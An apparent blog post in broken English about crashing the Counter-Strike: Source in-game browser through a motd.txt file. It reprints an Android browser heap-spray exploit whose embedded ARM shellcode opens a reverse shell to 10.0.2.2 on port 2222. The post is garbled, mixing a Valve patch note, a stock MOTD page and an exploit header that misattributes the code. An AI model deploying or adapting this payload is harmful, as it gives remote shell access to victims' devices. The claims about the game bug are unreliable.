Some times i play Counter Strike Source,for years ago i think this bulitin webserver/browser are vuln.But i never testet it now i know much more about Debugging,Exploit,Stack Smashing ……Than i found this Android Browser Exploit and want to test it on Css webserver .
Put motd.txt into steam folder Start Counter Strike Start a local game.The Game Load Motd next the game crashed instand with a error msg i dont know it.I Dont thinked it got fixed so fast But i think it was a Buffer overflow msg out of range or any thing else.It was very late ...
An update to Counter-Strike: Source has been released.
The update will be applied automatically when you restart Counter-Strike: Source.
The major changes include:
# Disabled Java for the in-game web browser "Thanks Valve for Remove Crap Java ;)
1 Day later it got fixed with Disabling Java plugins ……. hrhr
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<title>Cstrike MOTD</title>
<style type="text/css">
pre {
font-family:Verdana,Tahoma;
color:#FFB000;
}
body {
background:#000000;
margin-left:8px;
margin-top:0px;
}
a {
text-decoration: underline;
}
a:link {
color: #FFFFFF;
}
a:visited {
color: #FFFFFF;
}
a:active {
color: #FFFFFF;
}
a:hover {
color: #FFFFFF;
text-decoration: underline;
}
</style>
</head>
<body scroll="no">
<pre>
You are playing Counter-Strike: Source
Visit the official CS web site @
www.counter-strike.net
<a href="http://www.counter-strike.net">Visit Counter-Strike.net</a>
</pre>
</body>
</html>
<html>
<!--
# Exploit Title: Counter-Strike: Source motd_css_poc.txt BOF
# Date: 2013/19/03
# Author: cr4shyyy
# Software Link: http://store.steampowered.com/app/240/
# Version: < before 20.03.2013
# Tested on: Windows
# CVE :
# Just test if its works with the Steam build in webserver and it is crashed.I cant test it more cant Olly it.An update to Counter-Strike: Source has been released. The update will be applied automatically when you restart Counter-Strike: Source. The major changes include:
# Disabled Java for the in-game web browser "Thanks Valve for Remove Crap Java ;)
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->
<head>
<script language="JavaScript">
function heap()
{
var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("A")); };
var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\u3a0\u8d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate
do
{
scode += scode;
scode2 += scode2;
} while (scode.length<=0x1000);
scode2 += shell
target = new Array();
for(i = 0; i < 300; i++){
if (i<130){ target[i] = scode;}
if (i>130){ target[i] = scode2;}
document.write(target[i]);
document.write("<br />");
if (i>250){
// alert("freeze");
nodes[0].textContent}
}
}, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>
No comments:
Post a Comment